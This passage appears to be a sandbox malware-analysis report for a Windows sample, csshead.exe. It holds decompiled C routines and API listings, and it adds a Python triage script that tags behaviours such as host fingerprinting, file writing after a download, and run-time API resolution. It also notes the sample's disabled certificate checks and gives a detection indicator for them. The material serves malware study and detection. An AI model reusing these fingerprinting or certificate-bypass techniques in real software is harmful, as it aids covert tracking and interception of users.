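audit("https") reports three checks off (hostname, validity dates, unknown CA) and leaves only the revocation bit untouched, so the HTTPS branch accepts whatever certificate an interception proxy or an on-path attacker presents; the HTTP branch sends and receives everything in clear. For detection, an InternetSetOption(INTERNET_OPTION_SECURITY_FLAGS) write that adds SECURITY_FLAG_IGNORE_UNKNOWN_CA is the more specific indicator; the flags word alone is also used by legitimate clients that merely want to bypass the cache.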
    C-Code - Quality: 100%
    			E00404BA0(intOrPtr* __eax) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				long _v24;
    				long _v28;
    				signed int _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v41;
    				char _v298;
    				char* _t78;
    				intOrPtr _t82;
    				intOrPtr _t87;
    				intOrPtr _t92;
    				intOrPtr _t98;
    				CHAR* _t109;
    
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x101;
    				if(GetComputerNameA( &_v298,  &_v12) != 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_t78 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t78, 0, 0x20119,  &_v36);
    				_v12 = 0x101;
    				_t82 =  *0x40a0e4; // 0x401d14
    				if(E004038B0(_v36, _t82, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t87 =  *0x40a0e8; // 0x401d20
    				if(E004038B0(_v36, _t87, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t92 =  *0x40a0ec; // 0x401d2c
    				if(E004038B0(_v36, _t92, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 4;
    				_v20 = 0;
    				_t98 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v36, _t98, 0, 0,  &_v20,  &_v12);
    				E00403890(_v36);
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t109 =  *0x40a268; // 0x4021d0
    				GetVolumeInformationA(_t109, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0);
    				_v32 = _v20 ^ _v28 ^ _v24;
    				E00401164(_v32,  &_v298);
    				E00401308(_v8,  &_v298);
    				E00401164(_v16,  &_v298);
    				E0040133C(_v8,  &_v298);
    				_v40 = _v8;
    				_v41 = 0;
    				while( *_v40 != 0) {
    					_v41 = _v41 ^ E0040118C( *_v40);
    					_v40 = _v40 + 2;
    				}
    				E00401164(_v41,  &_v298);
    				return E0040133C(_v8,  &(( &_v298)[6]));
    			}

    Instruction addresses (the report's per-statement address column, one entry per statement line of the C code above, in order; 0x00000000 marks a line with no instruction of its own): 0x00404ba9 0x00404bae 0x00404bb1 0x00404bcb 0x00404be8 0x00404be8 0x00404bf6 0x00404c01 0x00404c07 0x00404c1d 0x00404c31 0x00404c4e 0x00404c4e 0x00404c51 0x00404c67 0x00404c7b 0x00404c98 0x00404c98 0x00404c9b 0x00404cb1 0x00404cc5 0x00404ce2 0x00404ce2 0x00404ce5 0x00404cee 0x00404cfd 0x00404d07 0x00404d12 0x00404d19 0x00404d1e 0x00404d23 0x00404d3a 0x00404d40 0x00404d4f 0x00404d5b 0x00404d69 0x00404d77 0x00404d87 0x00404d92 0x00404d95 0x00404dad 0x00404da6 0x00404da9 0x00404da9 0x00404dc0 0x00404dde

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
    • RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    • GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    C-Code - Quality: 100%
    (This entry decodes the same bytes as E00404BA0 above from an entry point five bytes earlier: from 0x00404ba9 on its instruction addresses and statements are identical to that function's. The two leading statements are produced from bytes before 0x00404BA0 and are not behaviour of the sample; read E00404BA0 for the host-identifier routine.)
    			E00404B9B(intOrPtr* __eax, void* __edx, intOrPtr _a122) {
    				intOrPtr* _v8;
    				long _v12;
    				long _v16;
    				signed int _v20;
    				long _v24;
    				long _v28;
    				signed int _v32;
    				void* _v36;
    				void* _v40;
    				signed int _v41;
    				char _v298;
    				char* _t80;
    				intOrPtr _t84;
    				intOrPtr _t89;
    				intOrPtr _t94;
    				intOrPtr _t100;
    				CHAR* _t111;
    
    				_a122 = _a122 + __edx;
    				 *__eax =  *__eax + __eax;
    				_v8 = __eax;
    				_v16 = 0;
    				_v12 = 0x101;
    				if(GetComputerNameA( &_v298,  &_v12) != 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_t80 =  *0x40a25c; // 0x402174
    				RegOpenKeyExA(0x80000002, _t80, 0, 0x20119,  &_v36);
    				_v12 = 0x101;
    				_t84 =  *0x40a0e4; // 0x401d14
    				if(E004038B0(_v36, _t84, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t89 =  *0x40a0e8; // 0x401d20
    				if(E004038B0(_v36, _t89, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 0x101;
    				_t94 =  *0x40a0ec; // 0x401d2c
    				if(E004038B0(_v36, _t94, 0, 0,  &_v298,  &_v12) == 0) {
    					_v16 = E00401BA8(_v16, E004012DC( &_v298),  &_v298);
    				}
    				_v12 = 4;
    				_v20 = 0;
    				_t100 =  *0x40a0f0; // 0x401d3c
    				E004038B0(_v36, _t100, 0, 0,  &_v20,  &_v12);
    				E00403890(_v36);
    				_v12 = 0;
    				_v28 = 0;
    				_v24 = 0;
    				_t111 =  *0x40a268; // 0x4021d0
    				GetVolumeInformationA(_t111, 0, 0,  &_v28,  &_v12,  &_v24, 0, 0);
    				_v32 = _v20 ^ _v28 ^ _v24;
    				E00401164(_v32,  &_v298);
    				E00401308(_v8,  &_v298);
    				E00401164(_v16,  &_v298);
    				E0040133C(_v8,  &_v298);
    				_v40 = _v8;
    				_v41 = 0;
    				while( *_v40 != 0) {
    					_v41 = _v41 ^ E0040118C( *_v40);
    					_v40 = _v40 + 2;
    				}
    				E00401164(_v41,  &_v298);
    				return E0040133C(_v8,  &(( &_v298)[6]));
    			}

    Instruction addresses (the report's per-statement address column, one entry per statement line of the C code above, in order; 0x00000000 marks a line with no instruction of its own): 0x00404b9b 0x00404b9e 0x00404ba9 0x00404bae 0x00404bb1 0x00404bcb 0x00404be8 0x00404be8 0x00404bf6 0x00404c01 0x00404c07 0x00404c1d 0x00404c31 0x00404c4e 0x00404c4e 0x00404c51 0x00404c67 0x00404c7b 0x00404c98 0x00404c98 0x00404c9b 0x00404cb1 0x00404cc5 0x00404ce2 0x00404ce2 0x00404ce5 0x00404cee 0x00404cfd 0x00404d07 0x00404d12 0x00404d19 0x00404d1e 0x00404d23 0x00404d3a 0x00404d40 0x00404d4f 0x00404d5b 0x00404d69 0x00404d77 0x00404d87 0x00404d92 0x00404d95 0x00404dad 0x00404da6 0x00404da9 0x00404da9 0x00404dc0 0x00404dde

    APIs
    • GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
    • RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
      • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
      • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
    • GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598108329.00403000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000002.16598086936.00400000.00000002.sdmp
    • Associated: 00000000.00000002.16598097640.00401000.00000040.sdmp
    • Associated: 00000000.00000002.16598122919.0040A000.00000004.sdmp
    • Associated: 00000000.00000002.16598135430.0040E000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_400000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00411AD3
    • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 00411AFD
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00411B2A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00420413
    • CallWindowProcA.USER32(?,?,00000082,?,?), ref: 0042043D
    • SetWindowLongA.USER32(?,000000FC,?), ref: 0042046A
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    APIs
    • DefFrameProcA.USER32(?,?,?,?,?), ref: 00418A9A
    • DefFrameProcA.USER32(?,?,00000082,?,?), ref: 00418AC4
    • SetWindowLongA.USER32(?,000000FC,?), ref: 00418AF1
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			E004117F0(struct HWND__** _a4, struct HWND__* _a8, intOrPtr _a12, intOrPtr _a16) {
    				intOrPtr _v4;
    				intOrPtr _v8;
    				long _v12;
    				long _v16;
    				long _v20;
    				intOrPtr _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				struct HWND__* _v36;
    				void* _t36;
    				intOrPtr _t40;
    				long _t42;
    				intOrPtr _t45;
    				void* _t46;
    				intOrPtr _t47;
    				struct HWND__* _t50;
    				struct HWND__* _t55;
    				struct HWND__* _t60;
    				void* _t61;
    				intOrPtr _t62;
    				struct HWND__** _t65;
    				void* _t66;
    				struct HWND__* _t67;
    
    				_t65 = _a4;
    				if(_t65 == 0) {
    					L11:
    					__eflags = 0;
    					return 0;
    				} else {
    					_t55 =  *_t65;
    					if(_t55 == 0) {
    						goto L11;
    					} else {
    						_t50 = _t65[7];
    						if(_t50 == 0) {
    							goto L11;
    						} else {
    							_t47 = _a16;
    							_t67 = _a8;
    							_t62 = _a12;
    							_v20 = 0;
    							_v12 = 0;
    							_v16 = 0;
    							_a4 = 0;
    							_v36 = _t55;
    							_a8 = _t65[9];
    							_t65[9] =  &_v36;
    							_v8 = 0x24;
    							_v4 = 1;
    							_v32 = _t67;
    							_v28 = _t62;
    							_v24 = _t47;
    							_t36 =  *((intOrPtr*)( *(_t50->i)))( *_t65, _t67, _t62, _t47,  &_a4, _t65[8], _t61, _t66, _t46);
    							_t65[9] = _v16;
    							if(_t36 != 0) {
    								L10:
    								return _v20;
    							} else {
    								if(_t67 == 0x82) {
    									_v16 = GetWindowLongA( *_t65, 0xfffffffc);
    									_t40 = L00411030(_t65, 0x82, _t62, _t47);
    									_t60 = _t65[6];
    									_v32 = _t40;
    									__eflags = _t60 -  *0x4334dc; // 0x3ef9e
    									if(__eflags != 0) {
    										_t42 = GetWindowLongA( *_t65, 0xfffffffc);
    										__eflags = _t42 - _v16;
    										if(_t42 == _v16) {
    											SetWindowLongA( *_t65, 0xfffffffc, _t65[6]);
    										}
    									}
    									 *_t65 = 0;
    									goto L10;
    								} else {
    									_t45 = L00411030(_t65, _t67, _t62, _t47);
    									_v32 = _t45;
    									return _t45;
    								}
    							}
    						}
    					}
    				}
    			}

    Instruction addresses (the report's per-statement address column, one entry per statement line of the C code above, in order; 0x00000000 marks a line with no instruction of its own): 0x004117f4 0x004117fc 0x00411902 0x00411902 0x00411908 0x00411802 0x00411802 0x00411806 0x00000000 0x0041180c 0x0041180c 0x00411811 0x00000000 0x00411817 0x00411818 0x0041181d 0x00411822 0x00411826 0x0041182a 0x0041182e 0x00411832 0x0041183a 0x00411848 0x00411852 0x00411855 0x0041185d 0x00411865 0x00411869 0x0041186d 0x00411877 0x0041187d 0x00411882 0x004118f4 0x004118ff 0x00411884 0x0041188a 0x004118ba 0x004118be 0x004118c3 0x004118c6 0x004118ca 0x004118d0 0x004118d7 0x004118d9 0x004118dd 0x004118e8 0x004118e8 0x004118dd 0x004118ee 0x00000000 0x0041188c 0x00411891 0x00411899 0x004118a1 0x004118a1 0x0041188a 0x00411882 0x00411811 0x00411806

    APIs
    • GetWindowLongA.USER32(00000000,000000FC), ref: 004118AF
      • Part of subcall function 00411030: CallWindowProcA.USER32(?,?,?,?,?), ref: 00411046
    • GetWindowLongA.USER32(00000000,000000FC), ref: 004118D7
    • SetWindowLongA.USER32(?,000000FC,?), ref: 004118E8
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    APIs
    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\csshead.exe,00000104), ref: 0042CD57
    • _parse_cmdline.LIBCMT ref: 0042CD82
      • Part of subcall function 0042A0DF: Sleep.KERNEL32(00000000,00000001,?,?,0042C016,00000018,0043D008,0000000C,0042C0A6,?,?,?,00425E08,0000000D), ref: 0042A100
    • _parse_cmdline.LIBCMT ref: 0042CDC3
    Strings
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 70%
    			E00420EC0(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __ebp) {
    				intOrPtr* _v4;
    				char _v8;
    				char _v12;
    				char _v16;
    				char _v20;
    				long _v24;
    				char _t17;
    				long _t23;
    				void* _t31;
    				void* _t47;
    				void* _t56;
    
    				_t47 = __edi;
    				_t31 = __ebx;
    				_t17 =  *0x440024; // 0x44001c
    				_v12 = _t17;
    				_push(1);
    				_push( &_v12);
    				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 0x2c))))() == 0 ||  *((intOrPtr*)(_v20 - 8)) == 0) {
    					L004020A0(_t31,  &_v20, _t47, "Untitled");
    				} else {
    					wsprintfA( &_v16, "%d",  *((intOrPtr*)(__ecx + 0x20)) + 1);
    					E004024C0( &_v12, __ebp, lstrlenA( &_v8),  &_v8);
    				}
    				 *((intOrPtr*)( *((intOrPtr*)( *_v4 + 0x4c))))(_v20);
    				_t23 = _v24;
    				_t56 = _t23 - 0xc -  *0x440020; // 0x440010
    				if(_t56 != 0) {
    					_t23 = InterlockedDecrement(_t23 + 0xfffffff4);
    					if(_t23 <= 0) {
    						_push(_v24 + 0xfffffff4);
    						return L004221B4();
    					}
    				}
    				return _t23;
    			}

    Instruction addresses (the report's per-statement address column, one entry per statement line of the C code above, in order; 0x00000000 marks a line with no instruction of its own): 0x00420ec0 0x00420ec0 0x00420ec3 0x00420ed0 0x00420ed4 0x00420eda 0x00420edf 0x00420f28 0x00420eeb 0x00420efa 0x00420f18 0x00420f18 0x00420f3b 0x00420f3d 0x00420f45 0x00420f4b 0x00420f51 0x00420f59 0x00420f61 0x00000000 0x00420f67 0x00420f59 0x00420f6d

    APIs
    • wsprintfA.USER32 ref: 00420EFA
    • lstrlenA.KERNEL32(?), ref: 00420F08
      • Part of subcall function 004024C0: InterlockedDecrement.KERNEL32(00000001), ref: 0040252D
    • InterlockedDecrement.KERNEL32(?), ref: 00420F51
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 58%
    			E00403B50(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32, intOrPtr _a36) {
    				struct HINSTANCE__* _t12;
    				_Unknown_base(*)()* _t13;
    				intOrPtr* _t26;
    
    				_t26 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) != 0) {
    						goto ( *0x433004);
    					}
    					goto L6;
    				} else {
    					_t12 = GetModuleHandleA("Advapi32.dll");
    					if(_t12 == 0) {
    						L6:
    						return 1;
    					} else {
    						_t13 = GetProcAddress(_t12, "RegCreateKeyTransactedA");
    						if(_t13 == 0) {
    							goto L6;
    						} else {
    							return  *_t13(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36,  *_t26, 0);
    						}
    					}
    				}
    			}

    Instruction addresses (the report's per-statement address column, one entry per statement line of the C code above, in order; 0x00000000 marks a line with no instruction of its own): 0x00403b51 0x00403b56 0x00403bb3 0x00403bb6 0x00403bb6 0x00000000 0x00403b58 0x00403b5d 0x00403b65 0x00403bbc 0x00403bc2 0x00403b67 0x00403b6d 0x00403b75 0x00000000 0x00403b77 0x00403bac 0x00403bac 0x00403b75 0x00403b65

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00403B5D
    • GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00403B6D
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
    C-Code - Quality: 58%
    			E00403BD0(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
    				struct HINSTANCE__* _t5;
    				_Unknown_base(*)()* _t6;
    				intOrPtr* _t12;
    
    				_t12 = __ecx;
    				if( *__ecx == 0) {
    					if( *((intOrPtr*)(__ecx + 4)) != 0) {
    						goto ( *0x433000);
    					}
    					goto L6;
    				} else {
    					_t5 = GetModuleHandleA("Advapi32.dll");
    					if(_t5 == 0) {
    						L6:
    						return 1;
    					} else {
    						_t6 = GetProcAddress(_t5, "RegDeleteKeyTransactedA");
    						if(_t6 == 0) {
    							goto L6;
    						} else {
    							return  *_t6(_a4, _a8, 0, 0,  *_t12, 0);
    						}
    					}
    				}
    			}

    Instruction addresses (the report's per-statement address column, one entry per statement line of the C code above, in order; 0x00000000 marks a line with no instruction of its own): 0x00403bd1 0x00403bd6 0x00403c14 0x00403c17 0x00403c17 0x00000000 0x00403bd8 0x00403bdd 0x00403be5 0x00403c1d 0x00403c23 0x00403be7 0x00403bed 0x00403bf5 0x00000000 0x00403bf7 0x00403c0d 0x00403c0d 0x00403bf5 0x00403be5

    APIs
    • GetModuleHandleA.KERNEL32(Advapi32.dll,?,00403D77,?,?,00000000,00407F6E,?), ref: 00403BDD
    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyTransactedA), ref: 00403BED
    Strings
    Memory Dump Source
    • Source File: 00000000.00000001.16492833487.00401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.16492829053.00400000.00000002.sdmp
    • Associated: 00000000.00000001.16492883376.00433000.00000004.sdmp
    • Associated: 00000000.00000001.16492897994.00440000.00000008.sdmp
    • Associated: 00000000.00000001.16492902766.00442000.00000004.sdmp
    • Associated: 00000000.00000001.16492907006.00445000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_csshead.jbxd
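The per-function "APIs" lists on this page expose the behaviours directly, without reading the decompilation: E00403C28 opens its output with CreateFileA(GENERIC_WRITE, CREATE_ALWAYS) and writes the response body into it; E00404BA0 derives a host identifier from GetComputerNameA, three string values and one DWORD under an HKEY_LOCAL_MACHINE key opened with KEY_READ | KEY_WOW64_64KEY (0x20119), and the volume serial from GetVolumeInformationA, XORed together and folded into the output string; E00403B50 and E00403BD0 resolve RegCreateKeyTransactedA and RegDeleteKeyTransactedA at run time with GetModuleHandleA + GetProcAddress and return 1 when either lookup fails. The script below is an added example for triaging such listings; it is not Joe Sandbox code. It parses the bullet format used on this page (including the "Part of subcall function" entries and entries without an argument list), decodes the CreateFileA and RegOpenKeyExA arguments, and tags a function with the behaviours above. The tag names and the rule set are this editor's choice, and the three embedded listings are copied from this page.

```python
"""Parse the per-function "APIs" lists of a Joe Sandbox report and tag behaviours.
Added triage example, not Joe Sandbox code; the rule set is this editor's choice."""
import re
from dataclasses import dataclass
from typing import List, Optional, Set

# One report bullet: "• API.MODULE(args), ref: ADDR", optionally prefixed with
# "Part of subcall function ADDR:", and sometimes with no argument list at all.
_LINE = re.compile(
    r"^\s*[•*-]\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>[\w@?$]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
_HEX8 = re.compile(r"^[0-9A-Fa-f]{8}$")

@dataclass
class Call:
    api: str
    module: str
    args: list                      # int for an 8-digit hex word, None for '?', str otherwise
    ref: int                        # address of the call site
    subcall: Optional[int] = None   # callee address when the call happens one level down

def _arg(tok: str):
    if tok == "?":
        return None
    return int(tok, 16) if _HEX8.match(tok) else tok

def parse_api_lines(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = _LINE.match(line)
        if not m:
            continue
        args = [_arg(t.strip()) for t in (m.group("args") or "").split(",") if t.strip()]
        sub = m.group("sub")
        calls.append(Call(m.group("api"), m.group("mod"), args,
                          int(m.group("ref"), 16), int(sub, 16) if sub else None))
    return calls

_ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE",
           0x20000000: "GENERIC_EXECUTE", 0x10000000: "GENERIC_ALL"}
_DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
                4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}
_HIVE = {0x80000000: "HKEY_CLASSES_ROOT", 0x80000001: "HKEY_CURRENT_USER",
         0x80000002: "HKEY_LOCAL_MACHINE", 0x80000003: "HKEY_USERS"}

def _is_int(args: list, i: int) -> bool:
    return len(args) > i and isinstance(args[i], int)

def describe(c: Call) -> str:
    """Render the arguments the report did record (a '?' is one it did not)."""
    a = c.args
    if c.api == "CreateFileA" and _is_int(a, 1) and _is_int(a, 4):
        access = "|".join(n for bit, n in _ACCESS.items() if a[1] & bit) or hex(a[1])
        return f"CreateFileA access={access} disposition={_DISPOSITION.get(a[4], hex(a[4]))}"
    if c.api == "RegOpenKeyExA" and _is_int(a, 0) and _is_int(a, 3):
        sam = []
        if a[3] & 0x20019 == 0x20019:
            sam.append("KEY_READ")
        if a[3] & 0x100:
            sam.append("KEY_WOW64_64KEY")
        return f"RegOpenKeyExA hive={_HIVE.get(a[0], hex(a[0]))} sam={'|'.join(sam) or hex(a[3])}"
    return c.api

def classify(calls: List[Call]) -> Set[str]:
    names = {c.api for c in calls}
    tags: Set[str] = set()
    if {"GetComputerNameA", "GetVolumeInformationA"} <= names:
        tags.add("host-fingerprint")          # name + volume serial -> machine ID (E00404BA0)
    if "WriteFile" in names and any(c.api == "CreateFileA" and _is_int(c.args, 1)
                                    and c.args[1] & 0x40000000 for c in calls):
        tags.add("writes-file")               # GENERIC_WRITE handle then WriteFile (E00403C28)
    for c in calls:
        if c.api == "GetProcAddress" and len(c.args) == 2 and isinstance(c.args[1], str):
            tags.add("resolves:" + c.args[1]) # run-time import (E00403B50 / E00403BD0)
    return tags

def triage(text: str) -> dict:
    calls = parse_api_lines(text)
    return {"tags": sorted(classify(calls)), "calls": [describe(c) for c in calls]}

# Listings copied from this page: E00403C28, E00404BA0 and E00403B50.
DOWNLOADER = """\
• CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00403E08
• WriteFile.KERNEL32(000000FF,?,00000004,?,00000000), ref: 00403E55
• CloseHandle.KERNEL32(000000FF), ref: 00403E6B
"""
FINGERPRINT = """\
• GetComputerNameA.KERNEL32(?,00000101), ref: 00404BC3
• RegOpenKeyExA.ADVAPI32(80000002,00402174,00000000,00020119,?), ref: 00404C01
  • Part of subcall function 004038B0: RegQueryValueExA.KERNELBASE(?,?,?,?,?,?,?,?,00406992,?,00401D3C,00000000,00000000,?,?), ref: 004038CC
  • Part of subcall function 00403890: RegCloseKey.ADVAPI32(?), ref: 0040389D
• GetVolumeInformationA.KERNEL32(004021D0,00000000,00000000,?,?,?,00000000,00000000), ref: 00404D40
"""
LOADER = """\
• GetModuleHandleA.KERNEL32(Advapi32.dll), ref: 00403B5D
• GetProcAddress.KERNEL32(00000000,RegCreateKeyTransactedA), ref: 00403B6D
"""

if __name__ == "__main__":
    for name, block in (("E00403C28", DOWNLOADER), ("E00404BA0", FINGERPRINT), ("E00403B50", LOADER)):
        print(name, triage(block))
```

Two caveats when extending the rule set. First, a `?` in the listing is an argument the sandbox could not recover, so decoders must tolerate missing values rather than assume a position is numeric. Second, do not add an anti-debug rule keyed on IsDebuggerPresent alone: on this page it appears only inside the 00429814 subcall group, next to SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetCurrentProcess and TerminateProcess, which is the sequence the MSVC C runtime uses on its fatal-error path, not an evasion check by the sample.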
    APIs
    • GetCapture.USER32 ref: 00413587
    • ClientToScreen.USER32(?,?), ref: 004135BE
    • GetWindowRect.USER32(?,?), ref: 004135E3
      • Part of subcall function 00411330: SetRect.USER32(?,00000000,?,?,?), ref: 00411382
    • PtInRect.USER32(?,?,?), ref: 00413659
      • Part of subcall function 00412EB0: DeleteDC.GDI32(00000000), ref: 00412ED3
    Memory Dump Source
    • Source File: 00000000.00000002.16598145890.00410000.00000020.sdmp, Offset: 00410000, based on PE: false
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_410000_csshead.jbxd
    C-Code - Quality: 100%
    			// Editor annotation: this routine matches WTL's CFrameWindowImplBase::OnMenuSelect, which
    			// puts the highlighted menu item's help text into the status bar. _a8 = wParam (LOWORD =
    			// item ID, HIWORD = MF_* flags), _a12 = hMenu, *(this+0x30) = m_hWndStatusBar, *_a16 = bHandled.
    			// Constants: 0x409 = SB_SIMPLE, 0x401 = SB_SETTEXTA, 0x1ff = SB_SIMPLEID | SBT_NOBORDERS.
    			E0041FF00(void* __ecx, signed short _a8, intOrPtr _a12, int* _a16) {
    				char _v255;    // _v256 and _v255 together are one 256-byte szBuff[256]; LoadStringA is
    				void* _v256;   // called with cchBufferMax 0x100, so the copy is bounded by the buffer
    				struct HWND__* _t18;
    				signed short _t24;
    				struct HINSTANCE__* _t25;
    				int _t26;
    				signed char _t35;
    				void* _t45;
    				void* _t53;
    				signed short _t55;
    				void* _t59;
    				void* _t60;
    
    				_t59 =  &_v256;
    				_t53 = __ecx;
    				 *_a16 = 0;                                  // bHandled = FALSE
    				_t18 =  *(__ecx + 0x30);                      // m_hWndStatusBar
    				if(_t18 == 0) {
    					L21:
    					return 1;
    				} else {
    					_t55 = _a8;
    					_t35 = _t55 >> 0x10;                         // HIWORD(wParam): menu flags
    					if(_t35 != 0xffff || _a12 != 0) {            // not the "menu closed" notification (flags 0xFFFF, hMenu NULL)
    						_v256 = 0;
    						E00422840( &_v255, 0, 0xff);                 // memset(szBuff + 1, 0, 255)
    						_t60 = _t59 + 0xc;
    						if((_t35 & 0x00000010) == 0) {               // MF_POPUP clear: a command ID, not a submenu
    							_t24 = _t55 & 0x0000ffff;                    // wID = LOWORD(wParam)
    							if(_t55 < 0xf000 || _t55 >= 0xf1f0) {
    								if(_t55 < 0xe110 || _t55 > 0xe11f) {
    									if(_t55 >= 0xff00 && _t55 <= 0xfffd) {
    										_t24 = 0xef1f;                               // ATL_IDS_IDLEMESSAGE
    									}
    								} else {
